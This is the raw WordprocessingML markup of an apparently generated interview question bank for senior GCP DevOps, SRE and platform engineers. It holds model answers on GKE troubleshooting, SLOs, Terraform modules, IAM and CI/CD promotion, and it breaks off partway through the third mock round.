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3C6E"/>
          <w:sz w:val="56"/>
        </w:rPr>
        <w:t>AI Mock Interview Question Bank</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="444444"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>Senior GCP DevOps / SRE / Platform Engineer / MLOps &amp; LLMOps Engineer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="666666"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>3190 unique questions with answers  •  Generated 2026-07-23</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>This document combines every question and answer from the ai-mock-interviewer question bank: the 80 fixed practice mock interview rounds, the full topic-organized technical question bank (GCP, Kubernetes/GKE, Terraform, Docker, CI/CD, Observability, Security, Networking, Linux, System Design, SRE/behavioral, Python, Go, FastAPI, Ansible, Scripting, Coding Exercises, MLOps, and LLMOps/GenAI), and the Technology Risk Lead track.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Part 1 — Fixed Mock Interview Rounds (1–80)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Each round is a fixed, realistic mock interview set. Use one round per practice session.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 1 - GKE Production Troubleshooting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Configuration drift: How would you detect and prevent configuration drift across applications, clusters, and cloud infrastructure?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Detect drift by running scheduled `terraform plan` jobs against live infrastructure and diffing actual Kubernetes cluster state against the GitOps-declared state (ArgoCD/Config Sync surface this automatically), alerting when a diff appears rather than discovering it during an incident. Prevent drift by making the deployment pipeline the only path to production - restrict console/manual access for routine changes, enforce it through IAM, and treat any manual emergency change as something that must be reconciled back into source control immediately afterward.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. SRE fundamentals: Design an SLO for a customer-facing API running on GKE. What SLIs would you choose, how would you calculate error budget, and how would it affect releases?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SRE/Reliability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Choose SLIs that reflect real user experience: request success rate (non-5xx responses) and latency (e.g. p95 under a threshold), measured from as close to the user as possible (load balancer metrics, not just app-internal). Set the SLO target (e.g. 99.9% success) based on business impact of failures, calculate the error budget as the allowed failure volume over the measurement window, and use the remaining budget to gate release velocity - healthy budget means ship freely, depleted budget means slow down and prioritize reliability work.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Cloud Monitoring: How would you design alerting policies in Google Cloud Monitoring to reduce alert fatigue and focus on user impact?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Alert on symptoms that directly indicate user impact (elevated error rate, latency breach, SLO burn rate) rather than every underlying cause, and use multi-window burn-rate alerting so fast, severe budget consumption pages immediately while slow, minor consumption creates a lower-urgency ticket instead of paging. Route every alert to a specific owner with a runbook link, and periodically prune alerts that fire without leading to action, since those are the ones training people to ignore pages.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Ingress controller: How would you debug an ingress path returning 404 or 502, from DNS to load balancer to ingress controller to service endpoints?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Work through the chain in order: confirm DNS resolves to the expected load balancer IP, check the load balancer's backend health status (unhealthy backends often produce 502s), verify the Ingress resource's host/path rules match the request exactly (404s are frequently a path-matching mismatch), and confirm the Service selector actually matches running, ready pod labels. A 502 specifically often means the LB reached the ingress controller but the ingress controller couldn't reach a healthy backend pod, so checking pod readiness is usually the fastest way to narrow it down.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Kubernetes Secrets: How would you compare Kubernetes Secrets, Secret Manager, External Secrets Operator, Sealed Secrets, and CSI drivers?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/DevSecOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Native Kubernetes Secrets are only base64-encoded (not encrypted at rest by default) and live in etcd, so they're the weakest option alone. Secret Manager is the source of truth for the actual secret value with proper encryption, access control, and rotation; External Secrets Operator syncs Secret Manager values into Kubernetes Secrets automatically so apps can still consume them natively; Sealed Secrets lets you safely commit encrypted secrets to Git (decrypted only by the in-cluster controller); and the Secret Manager CSI driver mounts secrets directly as files without ever creating a Kubernetes Secret object, avoiding etcd exposure entirely - generally the most secure pattern for GKE.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Pipeline caching: When can ML pipeline caching help, and when can it hide stale data or bad assumptions?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/GitOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Caching helps when a pipeline step's inputs genuinely haven't changed - re-running an expensive feature computation on identical upstream data wastes time and money. It becomes dangerous when the cache key doesn't actually capture everything that affects the output - for example caching on code version alone while the underlying data silently changed - which can serve a stale result that looks like a successful run. The fix is making cache keys include every meaningful input (code, data version, config) and treating cache hits as something to occasionally spot-check, not blindly trust.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Go services: If asked to build a Kubernetes controller or CLI in Go, how would you approach the design even if Go is not your primary language?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Lean on established patterns rather than inventing your own: use controller-runtime/kubebuilder for a controller (it handles the reconcile loop, informers, and leader election scaffolding) and Cobra for a CLI (standard flag/subcommand handling). Focus design effort on the actual business logic - what the reconcile loop needs to converge toward, what the CLI's core commands do - and rely on Go's straightforward syntax and the framework's conventions to fill in the rest, treating it as learning a new tool rather than a fundamentally different way of thinking about the problem.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Reliability review: What would you check before certifying a service as production-ready on GCP/GKE?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SRE/Reliability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check that SLOs are defined with corresponding alerts, the service has health checks (readiness/liveness) correctly configured, resource requests/limits are set appropriately, there's a tested rollback path and runbook for common failure modes, security basics are in place (least-privilege IAM, no hardcoded secrets, Workload Identity), and on-call ownership is assigned. A production-readiness checklist should be concrete and verifiable, not a vague 'looks good to me' sign-off.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 2 - Terraform and GCP Platform Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Terraform expert: How would you design reusable Terraform modules for GCP networking, IAM, GKE, Cloud Run, observability, and security so teams can consume them safely?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Design modules around a well-defined, minimal interface (clear required inputs, sane defaults for optional ones) that encodes your organization's best practices internally, so consuming teams don't need to know the low-level GCP resource details to use them correctly. Version modules semantically so teams can pin to a known-stable version and upgrade deliberately, keep security-sensitive defaults (like private-by-default networking) baked in rather than opt-in, and provide example usage and validation rules so misconfiguration fails fast at plan time rather than after apply.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Compute Engine operations: A Linux VM behind a load balancer has high CPU, many TIME_WAIT connections, and intermittent TLS errors. How would you debug it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: High CPU plus many TIME_WAIT connections suggests the VM is opening far more short-lived connections than it can cleanly close - check whether the application or a misbehaving client is not reusing connections (missing keep-alive) and consider tuning `net.ipv4.tcp_tw_reuse` if genuinely needed. Intermittent TLS errors alongside this pattern often point to the VM running out of ephemeral ports or file descriptors under load; check `ss -s` for connection state counts and file descriptor limits, and correlate CPU spikes with TLS handshake volume to confirm the causal chain before changing kernel parameters.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. IAM recommender: How would you use IAM Recommender and audit logs to reduce over-permissioned service accounts safely?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/DevSecOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use IAM Recommender's suggestions (based on actual permission usage over the lookback window) as a starting point, but cross-reference with audit logs to confirm a permission genuinely wasn't used before removing it, since Recommender can miss infrequent-but-legitimate uses (quarterly jobs, disaster recovery paths). Apply reductions in a lower-risk environment first, monitor for breakage after applying in production, and prefer removing to a slightly broader-than-minimal role initially rather than the absolute narrowest, iterating down further once confident.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Developer experience: How would you measure whether your platform improves developer experience and delivery speed?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Automation/Platform</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Measure concrete, comparable metrics: time from code commit to production deployment, time to provision a new service from scratch, percentage of infrastructure needs met via self-service versus tickets, and developer satisfaction via periodic surveys correlated with actual usage data. Track these over time and by team so you can see whether platform investments are actually moving the numbers, rather than relying on anecdotal feedback alone.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Capacity incident: A regional capacity shortage affects node pool scaling. How would you mitigate and redesign for resilience?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SRE/Reliability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Immediate mitigation means shifting load to a region/zone with available capacity if the architecture supports it, or requesting a capacity increase/using a different machine type that has availability. For redesign, reserve capacity ahead of need for critical workloads (committed use or reservations), design workloads to tolerate running across multiple zones/regions so a single-region shortage doesn't block scaling entirely, and build alerting on capacity trends so a shortage is anticipated before it becomes an incident.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. VPC Service Controls: When would you use VPC Service Controls, what problems does it solve, and what operational pain can it introduce?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use VPC Service Controls when you need to prevent data exfiltration from managed GCP services (like someone copying data from an internal BigQuery dataset to a personal GCP project) by creating a security perimeter around resources regardless of IAM permissions. It solves a real gap that IAM alone doesn't cover, but it introduces operational pain when legitimate cross-perimeter access (a partner integration, a new internal service outside the perimeter) breaks unexpectedly and requires explicit bridge rules or access levels to fix, which can be a slow, easy-to-misconfigure process if not planned for upfront.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. GKE multi-cluster: When would you use multiple GKE clusters versus one shared cluster, and how would you handle traffic, identity, policy, and operations?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use multiple clusters for strong isolation requirements (regulatory separation, blast-radius limiting between critical and non-critical workloads, or true multi-region active-active), and a shared cluster with strong namespace isolation when the isolation needs are softer and the operational overhead of managing many clusters outweighs the benefit. Multi-cluster requires a strategy for cross-cluster traffic (multi-cluster service mesh or a global load balancer), consistent identity (a shared Workload Identity/IAM approach), and centrally-enforced policy (Config Sync/Anthos Config Management) so clusters don't drift into inconsistent configurations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. BigQuery/data reliability: How would you approach BigQuery or data pipeline reliability when platform teams own infrastructure but data teams own pipelines?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Define a clear ownership boundary: the platform team owns the underlying infrastructure reliability (BigQuery slots/reservations, network, IAM, monitoring infrastructure), while data teams own pipeline correctness and SLAs for their specific datasets, with a shared on-call escalation path when it's unclear which side an issue belongs to. Provide data teams with self-service observability (query performance dashboards, pipeline SLA tracking) so they can own their reliability without needing platform team involvement for every issue, and establish a joint review process for changes that cross the boundary (like a reservation resize affecting multiple pipelines).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 3 - SRE Incident and Reliability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Alert fatigue: You inherit 500 alerts and noisy on-call. How would you rationalize alerts using SLOs and ownership?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SRE/Reliability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start by measuring which alerts actually fire and how often they lead to real action versus being acknowledged and ignored - this data alone usually reveals which 80% of alerts to cut or tune first. Rebuild the remaining alert set around SLO burn rate and clear user-impact signals rather than low-level infrastructure metrics, assign every surviving alert an explicit owning team, and require a runbook link on each one; anything that can't meet that bar gets deleted or demoted to a non-paging dashboard signal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Observability maturity: How would you assess whether an organization has mature observability or just many dashboards?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Mature observability means teams can answer 'why is this happening' quickly during an incident using correlated logs, metrics, and traces, not just look at pretty dashboards that were built once and never revisited. Assess it by checking: are SLOs defined and tied to alerts, can engineers trace a request end-to-end across services, is there a consistent structured logging/correlation ID standard, and - the real test - how quickly did the last few incidents actually get root-caused using the existing tooling versus relying on ad-hoc debugging.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. TLS rotation: How would you rotate TLS certificates for production ingress without downtime?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use a certificate manager (Google-managed certificates, or cert-manager in Kubernetes) that automates renewal well before expiry rather than manual rotation, and ensure the load balancer/ingress supports hot certificate reload so serving traffic isn't interrupted during the swap. Monitor certificate expiry proactively with alerts at multiple thresholds (30/14/3 days) as a safety net in case automated renewal fails, and always validate the new certificate is actually being served correctly (not just issued) before considering the rotation complete.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Artifact Registry: How would you design Artifact Registry repositories, IAM, cleanup policies, scanning, and promotion between environments?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Structure repositories by purpose/environment (e.g. separate dev and production repositories) with IAM scoped so only CI/CD service accounts can write, and cleanup policies that automatically remove old, untagged, or unpromoted images past a retention window to control storage cost. Enable automatic vulnerability scanning on push, and promote images between environments by copying the exact digest (not rebuilding) so what was scanned and tested in dev is bit-for-bit what reaches production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Immutable infrastructure: What does immutable infrastructure mean in cloud platforms, and when is mutable infrastructure still acceptable?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Automation/Platform</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Immutable infrastructure means you never modify a running instance/container in place - instead you build a new image/artifact with the change and replace the old one entirely, which eliminates configuration drift and makes rollback trivial (redeploy the previous artifact). Mutable infrastructure is still acceptable for things that are genuinely stateful and expensive to recreate, like a long-lived database VM where in-place patching is more practical than a full rebuild-and-migrate cycle, though even there, automation and consistent configuration management reduce the risk mutability introduces.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. CI/CD design: Design a safe promotion workflow from commit to production using GitHub Actions, Cloud Build, Jenkins, artifact promotion, approvals, and rollback.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/GitOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Trigger CI on commit to build, test, and produce one immutable artifact tagged with the git SHA, scan it for vulnerabilities, and promote that exact artifact through dev -&gt; staging -&gt; production by updating deployment references rather than rebuilding. Gate production promotion behind a required approval (a human reviewer or automated staging metric check), and keep the previous production artifact reference readily available so rollback is a fast, low-risk redeploy rather than a new build under pressure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. SLO burn rate: Explain multi-window multi-burn-rate alerting and how you would tune alerts for fast and slow burns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
